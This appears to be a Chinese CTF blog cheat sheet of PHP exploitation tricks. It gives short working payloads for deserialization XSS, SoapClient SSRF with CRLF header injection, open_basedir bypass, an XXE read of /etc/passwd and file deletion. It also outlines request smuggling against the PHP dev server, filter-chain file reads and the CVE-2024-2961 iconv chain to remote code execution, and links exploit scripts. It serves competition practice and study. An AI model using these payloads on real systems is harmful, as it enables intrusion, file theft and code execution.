php trick

常用原生类

Error/Exception xss

Error适用于php7、Exception适用于php5/7

开启报错的情况下

<?php
#demo
$test = unserialize($_GET['payload']);
echo $test;

#Error exp
$a = new Error("<script>alert('xss')</script>");
$b = serialize($a);
echo urlencode($b); 

#Exception exp
$a = new Exception("<script>alert('xss')</script>");
$b = serialize($a);
echo urlencode($b);  
?>

例题：[BJDCTF 2nd]xss之光

Error/Exception绕反序列化md5比较

<?php
$a = new Error("payload",1);$b = new Error("payload",2);
echo($a);
echo($b);

例题：[2020 极客大挑战]Greatphp

SoapClient

常用于SSRF/SSRF+CRLF

调用不存在的方法触发_call方法

<?php
$Client=new SoapClient(null,array('uri'=>'127.0.0.1','location'=>'http://127.0.0.1:9999/flag.txt'));
$Client->a();

#CRLF插入Cookie头
$client=new SoapClient(null,array('uri'=>'127.0.0.1','location'=>'http://127.0.0.1:9999/flag.txt','user_agent'=>'123\r\nCookie: PHPSESSID=123'));
$client->a();

例题：ctfshow web259

DirectoryIterator、GlobIterator、FilesystemIterator

多用于目录遍历

配合glob协议可以绕过open_basedir

<?php
$Iterator = new DirectoryIterator('glob:///*');
//$Iterator = new GlobIterator('glob:///*');
//$Iterator = new FilesystemIterator('glob:///*');
echo $Iterator;
?>

SimpleXMLElement

多用于XXE

PHP 5/7/8

<?php
$xml = <<<EOF
<?xml version = "1.0" encoding="utf-8"?>
<!DOCTYPE ANY [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<x>&xxe;</x>
EOF;
$XMLElement= new SimpleXMLElement($xml,LIBXML_NOENT);
echo($XMLElement);

例题：[SUCTF 2018]Homework

SplFileObject

关键找到触发__toSting方法的地方

<?php
#SplFileObject exp
$a = new SplFileObject('flag.txt');
echo $a;

ZipArchive

open方法可以删除文件

1
2
3

<?php
$Archive = new ZipArchive();
$Archive->open('flag.txt', ZipArchive::OVERWRITE);

例题：NepCTF2021 梦里花开牡丹亭

php源码泄漏

https://blog.projectdiscovery.io/php-http-server-source-disclosure/

PHP Development Server <= 7.4.21

php -S内置服务器启动

GET /phpinfo.php HTTP/1.1 
Host: 127.0.0.1
\r\n
\r\n
GET / HTTP/1.1
\r\n
\r\n

filters_chain_oracle

PHP filters can also be used to read local files when their content is not printed

没有打印的情况下读取任意文件

常见函数

file($_POST[0]);
file_get_contents($_POST[0]);
file_put_contents($_POST[0], "");
readfile($_POST[0]);
getimagesize($_POST[0]);
md5_file($_POST[0]);
sha1_file($_POST[0]);
hash_file('md5', $_POST[0]);
copy($_POST[0], '/tmp/test');

限制：

GET请求和header max_size
使用了file_exists 或 is_file 等不支持filter的函数

脚本：https://github.com/synacktiv/php_filter_chains_oracle_exploit

https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle

LFI_to_RCE

CVE-2024-2961

GLIBC中iconv库的漏洞

iconv在转换为ISO-2022-CN-EXT字符集时会产生缓冲区溢出

而在linux中，php将一个字符集转换为另一个字符集使用的是iconv()

php://filter的convert.iconv也是使用了iconv()

具体溢出处理原理可以看作者原文

https://www.ambionics.io/blog/iconv-cve-2024-2961-p1

读取/proc/self/maps绕过ASLR和PIE
根据maps算出php堆的地址和libc库的文件名
libc算出system()函数地址
缓冲区溢出rce

影响函数

file_get_contents
file
readfile
fgets
getimagesize
SplFileObject->read
file_put_contents
SoapClient->__construct
SimpleXMLElement->__construct
Imagick->__construct

各种绕过trick

https://hackfun.org/2018/01/09/CTF%E4%B8%AD%E5%B8%B8%E8%A7%81PHP%E7%89%B9%E6%80%A7%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/

pearcmd

https://y4tacker.github.io/2022/06/19/year/2022/6/%E5%85%B3%E4%BA%8Epearcmd%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/

https://tttang.com/archive/1312/

PCRE回溯次数

https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html#0x03-phppcrebacktrack_limit

preg_replace /e代码执行

https://xz.aliyun.com/t/2557

待补充...

web

#web #php

php trick

http://example.com/2024/09/08/php_trick/

作者

dddkia

发布于

2024年9月8日

许可协议

第三届广东省大学生网络攻防竞赛下一篇